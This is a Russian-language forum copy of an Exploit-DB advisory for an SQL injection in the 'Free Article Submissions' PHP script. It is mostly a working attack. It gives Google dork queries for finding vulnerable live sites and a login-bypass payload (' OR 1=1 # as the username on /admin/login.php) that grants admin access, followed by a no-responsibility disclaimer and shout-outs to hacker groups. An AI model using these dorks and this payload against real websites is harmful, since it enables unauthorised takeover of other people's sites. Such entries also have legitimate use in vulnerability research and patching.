- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 35492
- Проверка EDB
-
- Пройдено
- Автор
- BARRABRAVAZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2014-12-08
Код:
# Exploit Title: Free Article Submissions SQL Injection Vulnerability
# Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal"
inurl:/category.php?id=2 "Arts & Entertainment"
# Date: 07/12/2014
# Exploit Author: BarrabravaZ
# Vendor Homepage: http://www.articlesetup.com/
# Software Link: [download link if available]
# Version: 1.00
# Tested on: Windows
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
«««:»»» Author will be not responsible for any damage. «««:»»»
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
x
x Issue:
x SQL Injection Bypass Login
x
x Risk level: High
x ~ The remote attacker has the possibility to manage the website.
x ~ The remote attacker is able to login into website with access level as admin.
x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
##
## Proof Of Concept:
## http://127.0.0.1/admin/login.php
##
## Username : ' OR 1=1 #
## Password : barrabravaz
##
##
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Special thanks to:
[+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX
[+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx- Источник
- www.exploit-db.com
